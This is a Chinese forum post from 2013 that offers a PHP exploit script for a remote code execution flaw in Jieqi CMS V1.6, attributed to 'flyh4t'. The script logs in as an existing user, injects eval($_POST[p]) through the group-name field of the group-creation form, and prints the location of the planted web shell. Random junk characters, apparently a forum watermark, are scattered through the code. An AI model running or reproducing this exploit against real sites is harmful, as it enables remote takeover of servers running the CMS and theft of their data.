找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2100|回复: 0
打印 上一主题 下一主题

Jieqi(杰奇)CMS V1.6 PHP代码执行0day漏洞EXP

[复制链接]
跳转到指定楼层
楼主
发表于 2013-2-23 11:28:09 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
杰奇网站管理系统(简称 JIEQI CMS,中国国家版权局著作权登记号:2006SR03382)是一套模块化的网站架设系统,具备简单灵活、性能卓越、安全可靠等特性。我们为大家提供了目前最流行的杰奇小说连载系统、杰奇原创漫画系统及数字出版解决方案,并提供各类网站定制服务。& ^( K8 E/ m9 C0 v1 m9 |) E

, U' {! ^% R/ x" x & A$ q2 }9 x; _0 v! J2 u
该系统存在多个远程安全漏洞,今天报告的这个是1.6版本的一个远程代码执行漏洞,应该有2年多历史了。
9 g8 k6 _% w8 u1 N+ k5 S 需要有一个能创建圈子的用户。5 T; r$ |0 }# Q- u
1 \" w' ~8 M4 i
<?php! A( H7 U7 k& o) F; y8 K
$ l3 k  j1 i& w" ?! _
print_r('
5 N! X1 l. e9 D8 c: ^' l6 s7 F+---------------------------------------------------------------------------+# T5 s) P1 [2 P
Jieqi CMS V1.6 PHP Code Injection Exploit7 Q1 {! a( t! r2 ]( K, Y
by flyh4t. t7 c9 g7 x1 _9 H3 Y- X9 _9 e; L; S
mail: phpsec at hotmail dot com0 F1 T- v" g3 B' k
team: http://www.wolvez.org+ C7 Q/ o$ A* K. p$ n# W* V) Y6 E
+---------------------------------------------------------------------------++ w" x( J& s! v! @7 q- ~% I/ M! ~
'); /**
6 C$ n& C) ]2 _1 W1 l' a: k1 R! i( F * works regardless of php.ini settings, f& ^( K* W: v" }
*/ if ($argc < 5) { print_r('% g$ o+ J5 ?9 r( }
+---------------------------------------------------------------------------+
4 ?0 `, N% z4 b7 l0 H4 ]7 eUsage: php '.$argv[0].' host path username
  _0 Q+ \* g2 O; Z2 _host:      target server (ip/hostname)
" J! d. _/ H" V  M: q" @5 r/ Spath:      path to jieqicms ; q7 V8 ]" d# a. m" i- p* d3 M
uasename:  a username who can create group
& h8 z/ r0 v+ U# K, W8 H! \Example:  B7 c8 s9 o/ V! B7 B: q
php '.$argv[0].' localhost /jieqicmsv1.6/ vipuser1 password
3 U" v# O7 Q. R+---------------------------------------------------------------------------+6 T0 k; n6 E9 |- F% s# h# a! z; H
'); exit; } error_reporting(7); ini_set('max_execution_time', 0); $host = $argv[1]; $path = $argv[2]; $username = $argv[3]; $password = $argv[4]; /*get cookie*/ $cookie_jar_index = 'cookie.txt'; $url1 = "http://$host/$path/login.php"; $params = "password=$password&username=$username&usecookie=86400&submit=%26%23160%3B%B5%C7%26%23160%3B%26%23160%3B%C2%BC%26%23160%3B&action=login&jumpreferer=1"; $curl1 = curl_init(); curl_setopt($curl1, CURLOPT_URL, $url1); curl_setopt($curl1, CURLOPT_COOKIEJAR, $cookie_jar_index); curl_setopt($curl1, CURLOPT_POST, 1); curl_setopt($curl1, CURLOPT_POSTFIELDS, $params); ob_start(); $data1 = curl_exec($curl1); if ($data1 === FALSE) { echo "cURL Error: " . curl_error($ch); exit('exploit failed'); } curl_close($curl1); ob_clean(); /*get shell*/ $params ='-----------------------------23281168279961
. |5 H7 J% Q( t0 Z- I! j6 DContent-Disposition: form-data; name="gname"0 S" ^+ k; L% F' C& q1 X

" i3 U! e0 `: Q; r$ ]9 I3 p* A'; $params .="';"; $params .='eval($_POST[p]);//flyh4t5 [$ M2 d$ ]0 G) d) Z# O) ?) _
-----------------------------23281168279961
+ Z& R( S  z; `$ x! |+ ^$ [. nContent-Disposition: form-data; name="gcatid"2 q% B' d* e6 {+ p
5 n1 O4 `; T% {' r# s' b' T
1
: m. d* R: H: o! y. Q$ l( U-----------------------------23281168279961- r7 x2 b" ~6 t0 K/ P( z1 K' k0 l4 f7 r
Content-Disposition: form-data; name="gaudit"
/ }. T3 X9 c; v( l
3 V7 }: h- s- m7 w( F& \12 y! h: W' G0 L% m
-----------------------------23281168279961
" a  x; ^) |/ C% V7 F- KContent-Disposition: form-data; name="gbrief", R7 _" R' O- i/ T( `
# p( T! F. u- I  W
16 c6 k& @5 F0 k) {
-----------------------------23281168279961--
5 E; c6 r$ y4 U! W+ L: O" Y'; $url2 = "http://$host/$path/modules/group/create.php"; $curl2 = curl_init(); $header =array( 'Content-Type: multipart/form-data; boundary=---------------------------23281168279961' ); curl_setopt($curl2, CURLOPT_URL, $url2); curl_setopt($curl2, CURLOPT_HTTPHEADER, $header); curl_setopt($curl2, CURLOPT_COOKIEFILE, $cookie_jar_index); curl_setopt($curl2, CURLOPT_POST, 1); curl_setopt($curl2, CURLOPT_POSTFIELDS, $params); ob_start(); curl_exec($curl2); curl_close($curl2); $resp = ob_get_contents(); //$rs就是返回的内容 ob_clean(); www.2cto.com
/ V1 z$ O% T4 Z; _" Y
6 h# D/ a" u( y  P# K- |, [( s8 Qpreg_match('/g=([0-9]{1,4})/', $resp, $shell); //print_r($shell); //print_r($resp); $url = "http://$host/$path/files/group/userdir/0/$shell[1]/info.php"; echo "view you shell here(password:p)\r\n" ; echo $url;
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表